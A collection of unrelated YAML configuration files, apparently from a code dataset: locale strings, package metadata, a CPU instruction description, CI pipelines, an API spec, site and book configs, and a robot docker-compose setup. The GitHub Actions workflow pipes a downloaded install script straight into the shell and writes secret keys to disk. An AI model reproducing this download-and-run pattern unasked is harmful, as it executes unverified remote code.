manage_teachers: Gérer les Enseignants·es
number_of_programs: Nombre de formations
program:
educational_informations: Informations pédagogiques
main_informations: Informations essentielles
useful_informations: Informations pratiques
roles:
one: Rôle
other: Rôles
teachers:
one: Enseignant·e
other: Enseignants·es
enums:
education:
program:
level:
bachelor: Licence / bachelor
doctor: Doctorat
dut: DUT
first_year: Bac + 1
master: Master
second_year: Bac + 2
simple_form:
hints:
education_program:
capacity: Nombre de places disponibles par promotion
ects: European Credits Transfer System
prerequisites: Préalables nécessaires ou indispensables pour bénéficier d'une prestation déterminée. L'absence de prérequis doit être mentionnée.
objectives: "Énoncé des aptitudes et compétences, visées et évaluables, qui seront acquises au cours de la prestation. Aptitude : capacité d'appliquer un savoir et d'utiliser un savoir-faire pour réaliser des tâches et résoudre des problèmes. Compétences : capacité avérée de mettre en œuvre des savoirs, des savoir-faire et des dispositions personnelles, sociales ou méthodologiques dans des situations de travail ou d’études/formations, pour le développement professionnel ou personnel."
duration: La durée peut être exprimée en heure ou en jour. Elle peut également être forfaitisée ou estimée.
registration: "Délai d’accès : durée estimée entre la demande du bénéficiaire et le début de la prestation."
pricing: Prix de la prestation ou conditions tarifaires.
pedagogy: Modalités pédagogiques et/ou moyens et/ou outils utilisés pour mener à bien la prestation dispensée.
evaluation: Moyens mobilisés pour mesurer à l'aide de critères objectifs les acquis du bénéficiaire en cours et/ou à la fin de la prestation.
accessibility: Conditions d'accueil et d’accès des publics en situation de handicap (locaux, adaptation des moyens de la prestation).
description: Texte simple, sans HTML, pour le SEO
|
config/locales/education/fr.yml
|
homepage: https://github.com/hercules-ci/hercules-ci-agent#readme
changelog-type: markdown
hash: 21cede716e4c101357fa5ad0873c1552e9665687a7739a03aa37d5ed6664c95f
test-bench-deps: {}
maintainer: <EMAIL>
synopsis: Hercules CI API definition with Servant
changelog: |
# Changelog
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/)
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
## [0.7.1.0] - 2021-09-06
### Added
- Notification settings
- Email info
- State locks: opt-in locks to be used in conjunction with state files. Use of locks is not enforced.
### Changed
- `DerivationOutput.outputPath` is now nullable when retrieving build info
## [0.7.0.0] - 2021-06-22
### Added
- Account: manageInstallationURL, installationIsSelection
- AccountInstallationStatus
- signOut
- Agent labels
- By name variations of account and state endpoints
## [0.6.0.1] - 2020-04-21
### Fixed
- A warning
## [0.6.0.0] - 2020-03-07
### Added
- Build logs
- Evaluation log
- Attribute types
- Effects
- State files
- CLI authorization flow
- Endpoint for resolving git urls to projects
### Changed
- Adaptations to support servant streaming
## [0.5.0.0] - 2020-01-30
### Changed
- `hercules-ci-api-core` and `hercules-ci-api-agent` packages have been extracted.
### Added
- Account settings
- Project enable/disable
- Some authorization-related fields
- Billing
- Derivation info and events
- Job derivation statistics and improved status reporting
- Derivation and Job restarts
- Job cancellation
## [0.4.0.0] - 2019-08-30
### Fixed
- Swagger schema was wrong for a Result
- Swagger schema is now written using UTF-8 encoding
### Changed
- /jobs endpoint changed to be hierarchical
### Added
- Submit number of concurrent tasks to the backend for better scheduling of evaluations (to avoid IFD deadlocks)
- New endpoint to return evaluation build dependencies for IFD
## [0.3.0.0] - 2019-07-05
### Added
- The CachixCache JSON format for configuring binary caches.
- Endpoints for lifecycle management: hello, hearbeat, goodbye.
- requiredFeatures support
## 0.1.0.0
Initial release
[0.7.1.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.7.0.0...hercules-ci-api-0.7.1.0
[0.7.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.6.0.1...hercules-ci-api-0.7.0.0
[0.6.0.1]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.6.0.0...hercules-ci-api-0.6.0.1
[0.6.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.5.0.0...hercules-ci-api-0.6.0.0
[0.5.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.4.0.0...hercules-ci-api-0.5.0.0
[0.4.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.3.0.0...hercules-ci-api-0.4.0.0
[0.3.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.1.0.0...hercules-ci-api-0.3.0.0
[Unreleased]: https://github.com/hercules-ci/hercules-ci-agent/compare/stable...master
basic-deps:
cookie: -any
exceptions: -any
bytestring: -any
lens-aeson: -any
base: '>=4.7 && <5'
time: -any
text: -any
uuid: -any
http-api-data: -any
servant-auth-swagger: -any
servant-swagger: -any
servant-swagger-ui-core: -any
servant: '>=0.14.1'
memory: -any
containers: -any
string-conv: -any
lens: -any
servant-auth: -any
hercules-ci-api-core: -any
network-uri: -any
hashable: -any
swagger2: -any
aeson: -any
hercules-ci-api: -any
http-media: -any
profunctors: -any
all-versions:
- 0.6.0.0
- 0.6.0.1
- 0.7.0.0
- 0.7.1.0
author: Hercules <NAME>
latest: 0.7.1.0
description-type: haddock
description: ''
license-name: Apache-2.0
|
packages/he/hercules-ci-api.yaml
|
- name: xsetbv
long_name: "Set Extended Control Register"
purpose: |
"
Writes the contents of registers EDX:EAX into the 64-bit extended control
register (XCR) specified in the ECX register. (On processors that support
the Intel 64 architecture, the high-order 32 bits of RCX are ignored.)
The contents of the EDX register are copied to high-order 32 bits of the
selected XCR and the contents of the EAX register are copied to low-order
32 bits of the XCR. (On processors that support the Intel 64
architecture, the high-order 32 bits of each of RAX and RDX are
ignored.) Undefined or reserved bits in an XCR should be set to values
previously read. This instruction must be executed at privilege level 0
or in real-address mode; otherwise, a general protection exception #GP(0)
is generated. Specifying a reserved or unimplemented XCR in ECX will also
cause a general protection exception. The processor will also generate a
general protection exception if software attempts to write to reserved
bits in an XCR. Currently, only XCR0 is supported. Thus, all other
values of ECX are reserved and will cause a #GP(0). Note that bit 0 of
XCR0 (corresponding to x87 state) must be set to 1; the instruction will
cause a #GP(0) if an attempt is made to clear this bit. In addition, the
instruction causes a #GP(0) if an attempt is made to set XCR0[2] (AVX
state) while clearing XCR0[1] (SSE state); it is necessary to set both
bits to use AVX instructions; Section 13.3, “Enabling the XSAVE Feature
Set and XSAVE-Enabled Features,” of Intel® 64 and IA-32 Architectures
Software Developer’s Manual, Volume 1.
"
execution_contexts:
- execution_state: 64bit
logical_inputs:
- name: xcr
type: uint32
- name: value
type: uint64
register_operands:
- name: eax
input: true
- name: ecx
input: true
- name: edx
input: true
|
data/intel/instruction/architectural/xsetbv.yml
|
trigger:
- master
pool:
vmImage: 'windows-latest'
variables:
solution: '**/*.sln'
buildPlatform: 'Any CPU'
buildConfiguration: 'Release'
steps:
#ensure we're using an up-to-date sdk
- task: UseDotNet@2
inputs:
packageType: 'sdk'
version: '3.1.x'
- task: DotNetCoreCLI@2
displayName: Restore nuget packages
inputs:
command: restore
projects: '**/*.csproj'
workingDirectory: $(Build.SourcesDirectory)
# No need to build if we are just going to publish
# - task: DotNetCoreCLI@2
# displayName: 'Build Sloth.Api'
# inputs:
# command: 'build'
# projects: './sloth.api/sloth.api.csproj'
# arguments: '--configuration $(buildConfiguration)'
# - task: DotNetCoreCLI@2
# displayName: 'Build Sloth.Web'
# inputs:
# command: 'build'
# projects: './sloth.web/sloth.web.csproj'
# arguments: '--configuration $(buildConfiguration)'
# - task: DotNetCoreCLI@2
# displayName: 'Build Sloth.Jobs.CyberSource.BankReconcile'
# inputs:
# command: 'build'
# projects: './sloth.jobs.cybersource.bankreconcile/sloth.jobs.cybersource.bankreconcile.csproj'
# arguments: '--configuration $(buildConfiguration)'
# - task: DotNetCoreCLI@2
# displayName: 'Build Sloth.Jobs.Kfs.ScrubberUpload'
# inputs:
# command: 'build'
# projects: './sloth.jobs.kfs.scrubberupload/sloth.jobs.kfs.scrubberupload.csproj'
# arguments: '--configuration $(buildConfiguration)'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Api'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
modifyOutputPath: false
projects: './sloth.api/sloth.api.csproj'
arguments: '--configuration $(buildConfiguration) --output $(build.artifactstagingdirectory)/sloth.api'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Web'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
modifyOutputPath: false
projects: './sloth.web/sloth.web.csproj'
arguments: '--configuration $(buildConfiguration) --output $(build.artifactstagingdirectory)/sloth.web'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Jobs.CyberSource.BankReconcile w/ Web'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
projects: './sloth.jobs.cybersource.bankreconcile/sloth.jobs.cybersource.bankreconcile.csproj'
arguments: '--configuration $(buildConfiguration) --output $(Build.ArtifactStagingDirectory)/sloth.web/app_data/jobs/triggered'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Jobs.Kfs.ScrubberUpload w/ Web'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
projects: './sloth.jobs.kfs.scrubberupload/sloth.jobs.kfs.scrubberupload.csproj'
arguments: '--configuration $(buildConfiguration) --output $(Build.ArtifactStagingDirectory)/sloth.web/app_data/jobs/triggered'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Jobs.WebHooks.Resend w/ Web'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
projects: './sloth.jobs.webhooks.resend/sloth.jobs.webhooks.resend.csproj'
arguments: '--configuration $(buildConfiguration) --output $(Build.ArtifactStagingDirectory)/sloth.web/app_data/jobs/triggered'
- task: PublishBuildArtifacts@1
displayName: 'Publish Artifacts'
inputs:
PathtoPublish: '$(Build.ArtifactStagingDirectory)'
ArtifactName: 'build'
publishLocation: 'Container'
- task: DotNetCoreCLI@2
displayName: 'Test'
inputs:
command: 'test'
projects: './sloth.test/sloth.test.csproj'
|
azure-pipelines.yml
|
swagger: "2.0"
info:
description: "This is a REST API for a Book Directory, where is possible to add, get, update and delete books"
version: "1.0.0"
title: "Book Directory"
license:
name: "MIT License"
url: "https://opensource.org/licenses/MIT"
host: "localhost:8080"
basePath: "/"
tags:
- name: "Books"
description: "Every endpoint related to books"
schemes:
- "http"
paths:
/books:
post:
tags:
- "Books"
summary: "Adds a new book to the directory"
description: "Adds a new book to the directory"
operationId: "insertBook"
consumes:
- "application/json"
produces:
- "application/json"
parameters:
- in: "body"
name: "body"
description: "Book object that needs to be added to the directory"
required: true
schema:
$ref: "#/definitions/Book"
responses:
"200":
description: "Success"
get:
tags:
- "Books"
summary: "Get all the books from the directory"
description: "Get all the books from the directory"
operationId: "getBooks"
produces:
- "application/json"
responses:
"200":
description: "Success"
/books/{id}:
get:
tags:
- "Books"
summary: "Adds a new book to the directory"
description: "Adds a new book to the directory"
operationId: "getBook"
parameters:
- in: "path"
name: "id"
type: integer
description: "ISBN of the requested book"
required: true
responses:
"200":
description: "Success"
put:
tags:
- "Books"
summary: "Update a book from the directory"
description: "Update a book from the directory"
operationId: "updateBook"
parameters:
- in: "path"
name: "id"
type: integer
description: "ISBN of the requested book"
required: true
- in: "body"
name: "body"
description: "Book object that needs to be added to the directory"
required: true
schema:
$ref: "#/definitions/Book"
responses:
"200":
description: "Success"
delete:
tags:
- "Books"
summary: "Delete a book from the directory"
description: "Delete a book from the directory"
operationId: "deleteBook"
parameters:
- in: "path"
name: "id"
type: integer
description: "ISBN of the requested book"
required: true
responses:
"200":
description: "Success"
definitions:
Book:
type: "object"
properties:
isbn:
type: "integer"
description: "ISBN of the book"
name:
type: "string"
description: "Name of the book"
numberOfPages:
type: "integer"
description: "Number of pages of the book"
|
src/data/swagger.yaml
|
title: pst.libre.lu
logo: /assets/media/logo.png
tagline: pll
email: <EMAIL>
description: >
The most incomprehensible thing about the world is that it is comprehensible.
<NAME>
baseurl: ""
url: "https://pst.libre.lu"
permalink: pretty
favicon: /assets/media/favicon.png
hide_share_buttons: true
theme: bulma-clean-theme
# Disqus Comments
disqus:
# Leave shortname blank to disable comments site-wide.
# Disable comments for any post by adding `comments: false` to that post's YAML Front Matter.
# shortname: my_disqus_shortname
shortname:
plugins:
- jekyll-sitemap
- jekyll-paginate-v2
- kramdown-parser-gfm
- jekyll-target-blank
exclude:
- Gemfile
- clean-theme.gemspec
- Gemfile.lock
- node_modules
- vendor/bundle/
- vendor/cache/
- vendor/gems/
- vendor/ruby/
livereload: true
sass:
style: compressed
source_dir: _sass
#gh_sponsor: psteichen
#google_analytics: UA-code-here
defaults:
-
scope:
path: ""
type: "pages"
values:
show_sidebar: true
-
scope:
path: ""
type: "posts"
values:
author: "<NAME>"
layout: post
image: /assets/media/io.png
show_sidebar: true
markdown: kramdown
highlighter: rouge
footer_menu: footer_menu
collections:
lectures:
output: true
layout: lecture
sort_by: year
show_sidebar: false
talks:
output: true
layout: talk
sort_by: year
show_sidebar: false
tools:
output: true
layout: tool
image: https://via.placeholder.com/800x600
show_sidebar: false
############################################################
# Site configuration for the Jekyll 3 Pagination Gem
# The values here represent the defaults if nothing is set
pagination:
# Site-wide kill switch, disabled here it doesn't run at all
enabled: true
# Set to 'true' to enable pagination debugging. This can be enabled in the site config or only for individual pagination pages
debug: false
# The default document collection to paginate if nothing is specified ('posts' is default)
collection:
- talks
- lectures
# How many objects per paginated page, used to be `paginate` (default: 0, means all)
per_page: 4
# The permalink structure for the paginated pages (this can be any level deep)
permalink: '/page/:num/' # Pages are index.html inside this folder (default)
#permalink: '/page/:num.html' # Pages are simple html files
#permalink: '/page/:num' # Pages are html files, linked jekyll extensionless permalink style.
# Optional the title format for the paginated pages (supports :title for original page title, :num for pagination page number, :max for total number of pages)
title: ':title - page :num'
# Limit how many pagenated pages to create (default: 0, means all)
limit: 0
# Optional, defines the field that the posts should be sorted on (omit to default to 'date')
sort_field: 'date'
# Optional, sorts the posts in reverse order (omit to default decending or sort_reverse: true)
sort_reverse: true
# Optional, the default category to use, omit or just leave this as 'posts' to get a backwards-compatible behavior (all posts)
category: 'posts'
# Optional, the default tag to use, omit to disable
tag: ''
# Optional, the default locale to use, omit to disable (depends on a field 'locale' to be specified in the posts,
# in reality this can be any value, suggested are the Microsoft locale-codes (e.g. en_US, en_GB) or simply the ISO-639 language code )
locale: ''
# Optional,omit or set both before and after to zero to disable.
# Controls how the pagination trail for the paginated pages look like.
trail:
before: 2
after: 2
# Optional, the default file extension for generated pages (e.g html, json, xml).
# Internally this is set to html by default
extension: html
# Optional, the default name of the index file for generated pages (e.g. 'index.html')
# Without file extension
indexpage: 'index'
|
_config.yml
|
name: Dev Deploy
# Controls when the workflow will run
on:
# Triggers the workflow on push or pull request events but only for the main branch
push:
branches: [ develop ]
pull_request:
branches: [ develop ]
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
# This workflow contains a single job called "build"
build:
# The type of runner that the job will run on
runs-on: ubuntu-latest
env:
AWS_DEFAULT_REGION: us-east-1
TF_VAR_master_password: ${{ secrets.TF_VAR_master_password }}
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
permissions:
id-token: write
contents: write
# Steps represent a sequence of tasks that will be executed as part of the job
steps:
# Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
- name: checkout
uses: actions/checkout@v2
with:
fetch-depth: 0
persist-credentials: true # <--- this
- run: sleep 5 # there's still a race condition for now
- name: Configure AWS
run: |
export AWS_ROLE_ARN=arn:aws:iam::733041935482:role/GithubAWSTerraformRole
export AWS_WEB_IDENTITY_TOKEN_FILE=/tmp/awscreds
export AWS_DEFAULT_REGION=us-east-1
echo AWS_WEB_IDENTITY_TOKEN_FILE=$AWS_WEB_IDENTITY_TOKEN_FILE >> $GITHUB_ENV
echo GITHUB_TOKEN=$GITHUB_TOKEN >> $GITHUB_ENV
echo AWS_ROLE_ARN=$AWS_ROLE_ARN >> $GITHUB_ENV
echo AWS_DEFAULT_REGION=$AWS_DEFAULT_REGION >> $GITHUB_ENV
curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | jq -r '.value' > $AWS_WEB_IDENTITY_TOKEN_FILE
aws sts assume-role-with-web-identity --role-arn $AWS_ROLE_ARN --role-session-name mh9test --web-identity-token file://$AWS_WEB_IDENTITY_TOKEN_FILE --duration-seconds 3000 > /tmp/irp-cred.txt
export AWS_ACCESS_KEY_ID="$(cat /tmp/irp-cred.txt | jq -r ".Credentials.AccessKeyId")" >> $GITHUB_ENV
export AWS_SECRET_ACCESS_KEY="$(cat /tmp/irp-cred.txt | jq -r ".Credentials.SecretAccessKey")" >> $GITHUB_ENV
export AWS_SESSION_TOKEN="$(cat /tmp/irp-cred.txt | jq -r ".Credentials.SessionToken")" >> $GITHUB_ENV
# Runs a set of commands using the runners shell
- name: Setup infracost creds
run: |
mkdir ~/.config/infracost
echo "${{ secrets.INFRACOST_CREDS }}" > ~/.config/infracost/credentials.yml
chmod 600 ~/.config/infracost/credentials.yml
- name: Setup infra modules deploy key
run: |
mkdir ~/.ssh
echo "${{ secrets.ssh_key_shared_modules }}" > ~/.ssh/id_rsa
chmod 600 ~/.ssh/id_rsa
ssh-keyscan -t rsa github.com
- name: Install Terraform
uses: little-core-labs/install-terraform@v2.0.0
with:
version: 1.0.5
- name: Setup Terragrunt
uses: autero1/action-terragrunt@v1.1.0
with:
terragrunt_version: latest
- name: Interact with Terragrunt
run: terragrunt --version
# - name: Run infracost diff
# uses: infracost/infracost-gh-action@master
# env:
# INFRACOST_API_KEY: ${{ secrets.INFRACOST_API_KEY }}
# GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
# with:
# path: dev/us-east-1/dev
# entrypoint: scripts/ci/diff.sh
- name: Plan Terragrunt
working-directory: dev/us-east-1/dev
run: terragrunt run-all plan
- name: Run Infracost
working-directory: dev/us-east-1/dev
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: |
# Downloads the CLI based on your OS/arch and puts it in /usr/local/bin
curl -fsSL https://raw.githubusercontent.com/infracost/infracost/master/scripts/install.sh | sh
./calculate_costs.sh
- name: Setup Node.js
uses: actions/setup-node@v1
with:
node-version: '14.17.5'
- name: Install dependencies
working-directory: .
run: npm install
- name: Release
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: npx semantic-release
|
.github/workflows/deploy_develop.yml
|
title: "DEAD CODE COOKBOOK"
summary: "☠️デッドコードクックブック☠️
~デッドコードの作り方と復活の呪文~
[デッドコードレシピ一覧]
1. 🔖中断を利用するパターン
1-1. 🧪return後のコード
1-2. 🧪throw後のコード
1-3. 🧪break後のコード
1-4. 🧪goto後のコード
1-5. 🧪exit後のコード
1-6. 🧪throwする関数呼出後のコード
1-7. 🧪breakするコールバック関数呼出後のコード
1-8. 🧪実行時エラーとなる処理後のコード
1-9. 🧪(条件がfalseとなる)assert後のコード
2. 🔖終らない処理を利用するパターン
2-1. 🧪無限ループ後のコード
2-2. 🧪終らない関数呼出後のコード
3. 🔖単独で常にfalseとなる条件を利用するパターン
3-1. 🧪単独で常にfalse(リテラル)となる条件のif文
3-2. 🧪単独で常にfalse(定数)となる条件のif文
3-3. 🧪単独で常にfalse(変数)となる条件のif文
3-4. 🧪単独で常にfalse(演算結果)となる条件のif文
4. 🔖並列な複数の条件を利用するパターン
4-1. 🧪部分集合条件のelseif
4-2. 🧪部分集合条件のcase(switch)
4-3. 🧪空集合条件のelse
4-4. 🧪空集合条件のdefault(switch)
5. 🔖ネストした複数の条件を利用するパターン
5-1. 🧪部分集合条件のif(ネスト)
6. 🔖if以外の条件を利用するパターン
6-1. 🧪for継続条件が空集合条件
6-2. 🧪while継続条件が空集合条件
6-3. 🧪三項演算子が空集合条件
6-4. 🧪短絡評価が空集合条件
6-5. 🧪catchすることのないcatch節
6-6. 🧪次要素のないイテレータ
6-7. 🧪常にnullに対するnull条件演算子
7. 🔖高階関数を利用するパターン
7-1. 🧪空集合要素に対する高階関数
7-2. 🧪余分な高階関数の引数
8. 🔖定義のみで使用されないパターン
8-1. 🧪定義のみの関数
8-2. 🧪定義のみのプライベートメソッド
8-3. 🧪オーバライドされたメソッド
9. 🔖その他のパターン
9-1. 🧪1回しか実行されないのジェネレータのyield後のコード
[レイズ一覧]
1. 👼中断コード削除
2. 👼ネスト修正による中断コードの移動
3. 👼関数修正
4. 👼関数呼出追加
5. 👼実行時エラー修正
6. 👼条件削除
7. 👼条件修正
[ゾンビ化一覧]
1. 🧟goto文のラベルによるジャンプ
2. 🧟ホイスティング
3. 🧟組込モジュールの上書き
4. 🧟組込モジュールの隠蔽
5. 🧟実行時除去
6. 🧟fallthrough
[デッドコードツール一覧]
1. 🔪終らない関数
2. 🔪比較演算子を用いた常に同じ真偽値となる演算
3. 🔪数値演算を用いた常に同じ真偽値となる演算
4. 🔪文字列を用いた常に同じ真偽値となる演算
5. 🔪正規表現を用いた常に同じ真偽値となる演算
6. 🔪空集合要素を作る演算
[付録]
1. 🛐供養
1. 🧰対象言語と環境
"
topics: ["deadCode", "unreachableCode", "デッドコードクックブック", "デッドコードレシピ"]
published: true
price: 0
chapters:
- introduction
- index
- p_after
- r_after_return
- r_after_throw
- r_after_break
- r_after_goto
- r_after_exit
- r_after_func_throw
- r_after_yield_break
- r_after_runtime_error
- r_after_assert
- p_forever
- r_forever_loop
- r_forever_func
- p_simple_if
- r_simple_if_literal
- r_simple_if_const
- r_simple_if_variable
- r_simple_if_operation
- p_parallel_if
- r_parallel_elseif
- r_parallel_switch_case
- r_parallel_else
- r_parallel_switch_default
- p_nest_if
- r_nest_if
- p_cond_other
- r_cond_other_for
- r_cond_other_while
- r_cond_other_ternary
- r_cond_other_short_circuit
- r_cond_other_catch
- r_cond_other_iterator
- r_cond_other_null
- p_func
- r_func_empty
- r_func_arg
- p_def
- r_def_func
- r_def_method
- r_def_override
- p_other
- r_other_generator_yield
- a_after_stop_delete
- a_after_stop_move
- a_func_fix
- a_func_add
- a_runtime_error_fix
- z_goto
- z_hoisting
- z_builtin_override
- z_builtin_hide
- z_compile_delete
- z_fallthrough
- t_forever_func
- t_cond_comp
- t_cond_num
- t_cond_str
- t_cond_regex
- t_empty_set
- memorial
- environment
- afterword
|
books/dead-code-cookbook/config.yaml
|
version: "2.3"
services:
listener:
build:
context: .
dockerfile: Dockerfile.chatter
network_mode: service:husarnet-rosbot
ipc: service:husarnet-rosbot
volumes:
- ./secret/dds-config.xml:/dds-config.xml
environment:
- FASTRTPS_DEFAULT_PROFILES_FILE=/dds-config.xml
# - RMW_FASTRTPS_PUBLICATION_MODE=SYNCHRONOUS
command: ros2 run demo_nodes_cpp listener
rplidar:
image: husarion/rplidar:galactic
restart: unless-stopped
network_mode: service:husarnet-rosbot
ipc: service:husarnet-rosbot
devices:
- /dev/ttyUSB0
volumes:
- ./secret/dds-config.xml:/dds-config.xml
environment:
- FASTRTPS_DEFAULT_PROFILES_FILE=/dds-config.xml
# - RMW_FASTRTPS_PUBLICATION_MODE=SYNCHRONOUS
command: ros2 launch rplidar_ros2 rplidar_a3_launch.py
nav2:
image: husarion/nav2:galactic
restart: unless-stopped
network_mode: service:husarnet-rosbot
ipc: service:husarnet-rosbot
volumes:
- ./secret/dds-config.xml:/dds-config.xml
environment:
- FASTRTPS_DEFAULT_PROFILES_FILE=/dds-config.xml
# - RMW_FASTRTPS_PUBLICATION_MODE=SYNCHRONOUS
command: >
ros2 launch husarion_nav2 navigation2_bringup.launch.py
use_slam:=True
use_auto_localization:=False
use_sim_time:=False
# ROS Noetic + ROS 2 Galactic
bridge:
# image: ros:galactic-ros1-bridge
build:
context: .
dockerfile: Dockerfile.ros1_bridge
restart: unless-stopped
network_mode: service:husarnet-rosbot
ipc: service:husarnet-rosbot
volumes:
- ./secret/dds-config.xml:/dds-config.xml
environment:
- FASTRTPS_DEFAULT_PROFILES_FILE=/dds-config.xml
# - RMW_FASTRTPS_PUBLICATION_MODE=SYNCHRONOUS
- ROS_MASTER_URI=http://ros-master:11311
command: ros2 run ros1_bridge dynamic_bridge --bridge-all-topics
# command: sleep 3600
# ROS Master (using custom port in case Master is already running on host OS)
ros-master:
image: ros:melodic-ros-core
restart: unless-stopped
command: stdbuf -o L roscore
# ROS Melodic rosbot hardware layer
rosbot:
image: husarion/rosbot
restart: unless-stopped
devices:
- /dev/ttyS4 # must match environment SERIAL_PORT
environment:
- SERIAL_PORT=/dev/ttyS4 # default: ttyS1 - rosbot2.0; ttyS4 - rosbot2.0 `pro
- ROS_MASTER_URI=http://ros-master:11311
command: roslaunch --wait rosbot_description rosbot_docker.launch
husarnet-rosbot:
image: husarnet/husarnet
ipc: shareable
restart: unless-stopped
volumes:
- /var/lib/husarnet
- ./secret/id_rosbot:/var/lib/husarnet/id
sysctls:
- net.ipv6.conf.all.disable_ipv6=0
- net.ipv6.ip6frag_time=3
- net.ipv6.ip6frag_high_thresh=134217728
cap_add:
- NET_ADMIN
devices:
- /dev/net/tun
environment:
- HOSTNAME=rosbot
- JOINCODE=${HUSARNET_JOINCODE}
|
all-in-one-husarnet-fastdds/compose.rosbot.yaml
|